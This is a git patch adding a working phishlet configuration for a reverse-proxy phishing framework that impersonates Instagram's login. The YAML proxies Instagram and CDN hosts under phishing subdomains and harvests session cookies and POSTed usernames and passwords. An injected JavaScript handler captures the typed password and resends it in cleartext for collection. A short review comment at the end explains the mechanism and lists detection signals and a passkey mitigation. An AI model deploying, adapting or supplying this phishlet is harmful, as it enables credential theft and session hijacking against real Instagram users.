From 59dc8f7ff4a24a76066d2c77ff2807accc2f0cb0 Mon Sep 17 00:00:00 2001 From: Tijme Gommers Date: Fri, 5 Apr 2024 11:24:55 +0200 Subject: [PATCH] Added 3.0 compatible Instagram phishlet. --- Instagram.yaml | 93 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 Instagram.yaml diff --git a/Instagram.yaml b/Instagram.yaml new file mode 100644 index 0000000..644998d --- /dev/null +++ b/Instagram.yaml 
@@ -0,0 +1,93 @@ +kname: 'Instagram' +author: '@charlesbel' +min_ver: '3.0.0' + +proxy_hosts: + - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true} + - {phish_sub: 'graphql', orig_sub: 'graphql', domain: 'instagram.com', session: false, is_landing: false} + - {phish_sub: 'i', orig_sub: 'i', domain: 'instagram.com', session: false, is_landing: false} + - {phish_sub: 'img', orig_sub: 'instagram.fcdg1-1.fna', domain: 'fbcdn.net', session: false, is_landing: false} + - {phish_sub: 'static-cdn', orig_sub: 'static', domain: 'cdninstagram.com', session: false, is_landing: false} + - {phish_sub: 'scontent-cdn', orig_sub: 'scontent', domain: 'cdninstagram.com', session: false, is_landing: false} + +sub_filters: + - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} + - {triggers_on: 'www.instagram.com', orig_sub: 'graphql', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} + - {triggers_on: 'www.instagram.com', orig_sub: 'i', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} + - {triggers_on: 'www.instagram.com', orig_sub: 'static', domain: 'cdninstagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} + - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\/v\/)', replace: 'img.{domain}/v/', mimes: ['text/html', 'text/javascript', 
'application/json', 'application/javascript', 'application/x-javascript']} + - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\\\/v\\\/)', replace: 'img.{domain}\\/v\\/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} + +auth_tokens: + - domain: '.instagram.com' + keys: ['sessionid','.*,regexp'] + +credentials: + username: + key: 'username' + search: '(.*)' + type: 'post' + password: + key: 'unenc_password' + search: '(.*)' + type: 'post' + +login: + domain: 'www.instagram.com' + path: '/accounts/login' + +js_inject: + - trigger_domains: ["www.instagram.com"] + trigger_paths: ["/accounts/login/", "/", "/accounts/login"] + trigger_params: [] + script: | + const waitForEl = (selector) => { + return new Promise((resolve) => { + if (document.querySelector(selector)) { + return resolve(document.querySelector(selector)); + } + const observer = new MutationObserver((mutations) => { + if (document.querySelector(selector)) { + resolve(document.querySelector(selector)); + observer.disconnect(); + } + }); + observer.observe(document.body, { + childList: true, + subtree: true, + }); + }); + }; + waitForEl("form[id=loginForm]").then(() => { + let subButton = document.querySelector("button[type=submit]"); + let parent = subButton.parentElement; + async function a(ev) { + ev.stopPropagation(); + ev.preventDefault(); + if (!subButton.disabled) { + var password = document.getElementsByName("password")[0].value; + await fetch("/accounts/login/ajax/", { + method: "POST", + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: "unenc_password=" + encodeURIComponent(password), + }); + parent.removeEventListener("click", a, true); + ev.target.click(); + } + } + parent.addEventListener("click", a, true); + new MutationObserver(function (mutations) { + mutations.forEach(function (mutation) { + if ( + mutation.type 
== "attributes" && + mutation.attributeName == "disabled" && + mutation.target.disabled == true + ) { + parent.removeEventListener("click", a, true); + parent.addEventListener("click", a, true); + } + }); + }).observe(document.querySelector("button[type=submit]"), { + attributes: true, + }); + });
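Review bot: The `script:` block under `js_inject` has no comment saying what it does, and nothing in the file links it to `credentials.password`, so a reader has to trace the handler to see that the two belong together. As written, the capture-phase click listener on the submit button's parent reads the `password` input and sends it in cleartext, in an extra form-encoded POST to `/accounts/login/ajax/` whose only field is `unenc_password`, before re-firing the original click. A one-line YAML comment above `script:`, for example `# injected handler: posts the typed password as unenc_password (matched by credentials.password), then re-fires the click`, would make that behaviour reviewable. For detection write-ups based on this file, the visible signals are that lone-field POST (presumably relayed upstream like any other request, which is worth confirming), the `auth_tokens` rule `['sessionid','.*,regexp']` that collects every `.instagram.com` cookie, and the `proxy_hosts` subdomain set `www`, `graphql`, `i`, `img`, `static-cdn` and `scontent-cdn` appearing under a single non-Instagram parent domain. Origin-bound authenticators (WebAuthn/passkeys) are the relevant mitigation, since they will not complete against the proxy hostname.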